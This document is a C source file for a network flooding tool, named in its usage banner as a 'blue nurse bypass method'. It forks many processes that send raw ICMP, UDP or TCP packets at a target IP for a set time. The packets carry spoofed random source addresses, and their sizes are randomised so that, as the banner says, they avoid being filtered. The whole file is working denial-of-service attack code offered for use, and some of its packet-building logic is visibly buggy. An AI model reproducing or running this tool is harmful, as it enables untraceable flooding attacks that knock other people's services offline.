1
#include <time.h>
2
#include <stdio.h>
3
#include <string.h>
4
#include <signal.h>
5
#include <stdlib.h>
6
#include <unistd.h>
7
#include <sys/time.h>
8
#include <arpa/inet.h>
9
#include <linux/udp.h>
10
#include <linux/tcp.h>
11
#include <linux/icmp.h>
12
#include <sys/socket.h>
13
#include <netinet/ip.h>
14
int ports[] = {
15
        7, 22, 53, 69, 80, 143, 152, 161, 443, 8080 
16
};
17
char *strings[] = {
18
    "\x5c\x78\x38\x66\x5c\x72\x5c\x6e",
19
    "\x68\x65\x6c\x6c\x6f\x20\x77\x6f\x72\x6c\x64\x21",
20
    "\x47\x45\x54\x20\x2f\x20\x48\x54\x54\x50\x2f\x31\x2e\x31",
21
    "\x43\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e\x3a\x20\x63\x6c\x6f\x73\x65",
22
    "\x55\x44\x50\x2d\x43\x48\x45\x43\x4b\x2d\x49\x50\x50\x52\x4f\x54\x4f\x5f\x55\x44\x50",
23
    "\x55\x73\x65\x72\x2d\x41\x67\x65\x6e\x74\x3a\x20\x57\x67\x65\x74\x2f\x31\x2e\x31\x34\x2e\x31"
24
};
25
char *rand_strs[] = {"a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "n", "o", "p", "q", 
26
"r", "s", "t", "u", "v", "w", "x", "y", "z", "A", "B", "C", "D", "E", "F", "G", "H", "I", "J", "K", "L", 
27
"M", "N", "O", "P", "Q", "R", "S", "T", "U", "V", "W", "X", "Y", "Z", "1", "2", "3", "4", "5", "6", "7", 
28
"8", "9", "0", "!", "@", "#", "$", "%", "^", "&", "*", "(", ")", "п", "ь", "и", "ക", "ച", "ദി", "ല"};
29
in_addr_t util_local_addr()
30
{
31
    int fd = 0;
32
    struct sockaddr_in addr;
33
    socklen_t addr_len = sizeof(addr);
34
    if((fd = socket(AF_INET, SOCK_DGRAM, 0)) == -1) {
35
        return 0;
36
    }
37

38
    addr.sin_family = AF_INET;
39
    addr.sin_addr.s_addr = inet_addr("8.8.8.8");
40
    addr.sin_port = htons(53);
41

42
    connect(fd, (struct sockaddr *)&addr, sizeof(struct sockaddr_in));
43

44
    getsockname(fd, (struct sockaddr *)&addr, &addr_len);
45
    close(fd);
46

47
    return addr.sin_addr.s_addr;
48
}
49
char *rand_host() {
50
    char *host = malloc(16);
51
    sprintf(host, "%d.%d.%d.%d", rand() % 256, rand() % 256, rand() % 256, rand() % 256);
52
    return host;
53
}
54
uint16_t checksum_generic(uint16_t *addr, uint32_t count)
55
{
56
    register unsigned long sum = 0;
57

58
    for (sum = 0; count > 1; count -= 2)
59
        sum += *addr++;
60
    if (count == 1)
61
        sum += (char)*addr;
62

63
    sum = (sum >> 16) + (sum & 0xFFFF);
64
    sum += (sum >> 16);
65
    
66
    return ~sum;
67
}
68
unsigned short csum (unsigned short *buf, int count)
69
{
70
        register unsigned long sum = 0;
71
        while( count > 1 ) { sum += *buf++; count -= 2; }
72
        if(count > 0) { sum += *(unsigned char *)buf; }
73
        while (sum>>16) { sum = (sum & 0xffff) + (sum >> 16); }
74
        return (unsigned short)(~sum);
75
}
76
unsigned short in_cksum(unsigned short* addr, int len)
77
{
78
   register int sum = 0;
79
   u_short answer = 0;
80
   register u_short* w = addr;
81
   register int nleft;
82
   /*
83
   * Our algorithm is simple, using a 32 bit accumulator (sum), we add
84
   * sequential 16 bit words to it, and at the end, fold back all the
85
   * carry bits from the top 16 bits into the lower 16 bits.
86
   */
87
   for(nleft = len; nleft > 1; nleft -= 2)
88
   {
89
      sum += *w++;
90
   }
91
   /* mop up an odd byte, if necessary */
92
   if(nleft == 1)
93
   {
94
      *(u_char*) (&answer) = *(u_char*) w;
95
      sum += answer;
96
   }
97
   /* add back carry outs from top 16 bits to low 16 bits */
98
   sum = (sum >> 16) + (sum & 0xffff); /* add hi 16 to low 16 */
99
   sum += (sum >> 16); /* add carry */
100
   answer = ~sum; /* truncate to 16 bits */
101
   return answer;
102
}
103
unsigned short udpcsum(struct iphdr *iph, struct udphdr *udph) {
104
    struct udp_pseudo
105
    {
106
        unsigned long src_addr;
107
        unsigned long dst_addr;
108
        unsigned char zero;
109
        unsigned char proto;
110
        unsigned short length;
111
    } pseudohead;
112
    pseudohead.src_addr=iph->saddr;
113
    pseudohead.dst_addr=iph->daddr;
114
    pseudohead.zero=0;
115
    pseudohead.proto=IPPROTO_UDP;
116
    pseudohead.length=htons(sizeof(struct udphdr));
117
    int totaltudp_len = sizeof(struct udp_pseudo) + sizeof(struct udphdr);
118
    unsigned short *udp = malloc(totaltudp_len);
119
    memcpy((unsigned char *)udp,&pseudohead,sizeof(struct udp_pseudo));
120
    memcpy((unsigned char *)udp+sizeof(struct udp_pseudo),(unsigned char *)udph,sizeof(struct udphdr));
121
    unsigned short output = csum(udp,totaltudp_len);
122
    free(udp);
123
    return output;
124
}
125
uint16_t checksum_tcpudp(struct iphdr *iph, void *buff, uint16_t data_len, int len)
126
{
127
    const uint16_t *buf = buff;
128
    uint32_t ip_src = iph->saddr;
129
    uint32_t ip_dst = iph->daddr;
130
    uint32_t sum = 0;
131
    
132
    while (len > 1)
133
    {
134
        sum += *buf;
135
        buf++;
136
        len -= 2;
137
    }
138

139
    if (len == 1)
140
        sum += *((uint8_t *) buf);
141

142
    sum += (ip_src >> 16) & 0xFFFF;
143
    sum += ip_src & 0xFFFF;
144
    sum += (ip_dst >> 16) & 0xFFFF;
145
    sum += ip_dst & 0xFFFF;
146
    sum += htons(iph->protocol);
147
    sum += data_len;
148

149
    while (sum >> 16) 
150
        sum = (sum & 0xFFFF) + (sum >> 16);
151

152
    return ((uint16_t) (~sum));
153
}
154
void init_ip_headers(struct iphdr *iph, char *rdbuf, char *dhost, int spoof, int protocol) {
155
    char *shost;
156
    if(spoof == 1) {
157
        shost = rand_host();
158
        iph->saddr = inet_addr(shost);
159
        free(shost);
160
    }
161
    else {
162
        iph->saddr = util_local_addr();
163
    }
164
    iph->daddr = inet_addr(dhost);
165
    iph->ttl = 64;
166
    iph->version = 4;
167
    iph->protocol = protocol;
168
    iph->ihl = 5;
169
    iph->id = rand();
170
    iph->tot_len = sizeof(rdbuf) + sizeof(struct iphdr) + sizeof(struct udphdr);
171
    iph->check = 0;
172
    iph->check = checksum_generic((uint16_t *)iph, sizeof (struct iphdr));
173

174
}
175
void init_tcp_headers(struct iphdr *iph, struct tcphdr *tcph, int dport, int syn, int ack, int fin, int rst, int urg, int psh) {
176
    tcph->source = htons(rand() % 65536);
177
    tcph->dest = htons(dport);
178
    tcph->doff = 5;
179
    tcph->fin = fin;
180
    tcph->syn = syn;
181
    tcph->rst = rst;
182
    tcph->psh = psh;
183
    tcph->ack = ack;
184
    tcph->urg = urg;
185
    tcph->window = htons(rand() % 0xffff);
186
    tcph->check = 0;
187
    tcph->check = checksum_tcpudp(iph, tcph, htons(sizeof (struct tcphdr)), sizeof (struct tcphdr));
188

189
}
190
void init_udp_headers(struct udphdr *udph, int dport, int psize) {
191
    udph->len = psize;
192
    udph->source = htons(rand() % 65536);
193
    udph->dest = htons(dport);
194
    udph->check = 0;
195
}
196
void init_icmp_headers(struct icmphdr *icmph) {
197
    icmph->un.echo.sequence = rand();
198
    icmph->un.echo.id = rand();
199
    icmph->type = ICMP_ECHO;
200
    icmph->code = 0;
201
    icmph->checksum = 0;
202
    icmph->checksum = in_cksum((unsigned short *)icmph, sizeof(struct icmphdr));
203
}
204
char **str_split(char *buffer, char *delim, size_t *count)
205
{
206
    char **retargs, *token;
207
    retargs = malloc(1 * sizeof(char *));
208
    token = strtok_r(buffer, delim, &buffer);
209
    while (token)
210
    {
211
        retargs = realloc(retargs, (*count + 1) * sizeof(char *));
212
        retargs[(*count)++] = token;
213
        token = strtok_r(NULL, delim, &buffer);
214
    }
215
    return retargs;
216
}
217

218
int verify_ip(char *ip)
219
{
220
    size_t argc = 0;
221
    char **args = str_split(ip, ".", &argc);
222

223
    if (argc == 4)
224
    {
225
        if (atoi(args[0]) < 256 && atoi(args[1]) < 256 && atoi(args[2]) < 256 && atoi(args[3]) < 256)
226
        {
227
            free(args);
228
            return 1;
229
        }
230
    }
231

232
    free(args);
233
    return 0;
234
}
235
char *rand_str(int size) {
236
    int i = 0;
237
    char *string = malloc((size * 2) + 1);
238

239
    while(i < size) {
240
        if(i == 0) {
241
            sprintf(string, "%s", rand_strs[rand() % sizeof(rand_strs)/sizeof(rand_strs[0])]);
242
        } else {
243
            sprintf(string, "%s%s", string, rand_strs[rand() % sizeof(rand_strs)/sizeof(rand_strs[0])]);
244
        }
245
        i++;
246
    }
247
    return string;
248
}
249
char *str_gen() {
250
    char *string = malloc(512);
251
    char *random = rand_str(rand() % 30);
252
    sprintf(string, "%s", strings[rand() % sizeof(strings)/sizeof(strings[0])]);
253
    sprintf(string, "%s%s", string, random);
254
    free(random);
255
    return string;
256
}
257
void blue_nurse_flood(char *host, int seconds, int psize, int spoof) {
258
    srand(time(NULL) ^ getpid());
259
    
260
    char rdbuf[500];
261
    int port = rand() % sizeof(ports)/sizeof(ports[0]), start = time(NULL), icmp, tcp, sock, udp;
262

263
    psize = psize + rand() % 513;
264

265
    struct sockaddr_in addr;
266
    struct iphdr *iph = (struct iphdr *)rdbuf;
267

268
    switch (port) {
269
        case 7:
270
            icmp = 1;
271
        case 22:
272
            tcp = 1;
273
        case 80:
274
            tcp = 1;
275
        case 443:
276
            tcp = 1;
277
        default:
278
            udp = 1, icmp = 0, tcp = 0;
279
    }
280

281
    if(icmp) {
282
        char *string = str_gen();
283

284
        sock = socket(AF_INET, SOCK_RAW, IPPROTO_ICMP);
285
        struct icmphdr *icmph = (struct icmphdr *) (rdbuf + sizeof(struct iphdr));
286

287
        init_ip_headers(iph, rdbuf, host, 1, IPPROTO_ICMP);
288
        init_icmp_headers(icmph);
289

290
        memcpy((void *)icmph + sizeof(struct icmphdr), string, strlen(string));
291
        free(string);
292
    } else if(udp) {
293
        char *string = str_gen();
294

295
        sock = socket(AF_INET, SOCK_RAW, IPPROTO_UDP);
296
        struct udphdr *udph = (struct udphdr *) (rdbuf + sizeof(struct iphdr));
297

298
        init_ip_headers(iph, rdbuf, host, 1, IPPROTO_UDP);
299
        init_udp_headers(udph, port, sizeof(string) - 1 + sizeof(struct iphdr) + sizeof(struct udphdr));
300
        udph->check = udpcsum(iph, udph);
301

302
        memcpy((void *)udph + sizeof(struct udphdr), string, strlen(string));
303
        free(string);
304
    } else if(tcp) {
305
        char *string = str_gen();
306

307
        sock = socket(AF_INET, SOCK_RAW, IPPROTO_TCP);
308
        struct tcphdr *tcph = (struct tcphdr *) (rdbuf + sizeof(struct udphdr));
309

310
        init_ip_headers(iph, rdbuf, host, 1, IPPROTO_TCP);
311
        init_tcp_headers(iph, tcph, port, rand() % 2, rand() % 2, rand() % 2, rand() % 2, rand() % 2, rand() % 2);
312

313
        memcpy((void *)tcph + sizeof(struct tcphdr), string, strlen(string));
314
        free(string);
315
    }
316

317
    addr.sin_addr.s_addr = inet_addr(host);
318
    addr.sin_port = htons(port);
319
    addr.sin_family = AF_INET;
320

321
    while(time(NULL) < start + seconds) {
322
        sendto(sock, rdbuf, psize, MSG_NOSIGNAL, (struct sockaddr *)&addr, sizeof(struct sockaddr_in));
323
    }
324
    close(sock);
325
}
326
int main(int argc, char **argv) {
327
    if(argc != 5) {
328
        printf("Welcome to blue nurse bypass method coded by urmommy\r\nUsage: %s [host] [time] [psize] [forks]\r\nNote there is a random psize between 0 and 512 added onto the psize you give to prevent getting filtered\r\nProtocols used in the method: icmp, tcp, udp\r\nMethod is spoofed by defualt\r\n", argv[0]);
329
        return -1;
330
    }
331
    signal(SIGCHLD, SIG_IGN);
332
    signal(SIGPIPE, SIG_IGN);
333
    char host[strlen(argv[1]) + 1];
334
    sprintf(host, "%s", argv[1]);
335
    if(!verify_ip(host)) {
336
        printf("Invalid ip address: %s\r\n", argv[1]);
337
        return -1;
338
    }
339
    for(int i = 0; i < atoi(argv[4]); i++) {
340
        if(!fork()) {
341
            blue_nurse_flood(argv[1], atoi(argv[2]), atoi(argv[3]), 1);
342
            _exit(0);
343
        }
344
    }
345
    printf("[main] forks initiated bypassing: %s\r\n", argv[1]);
346
}
347

348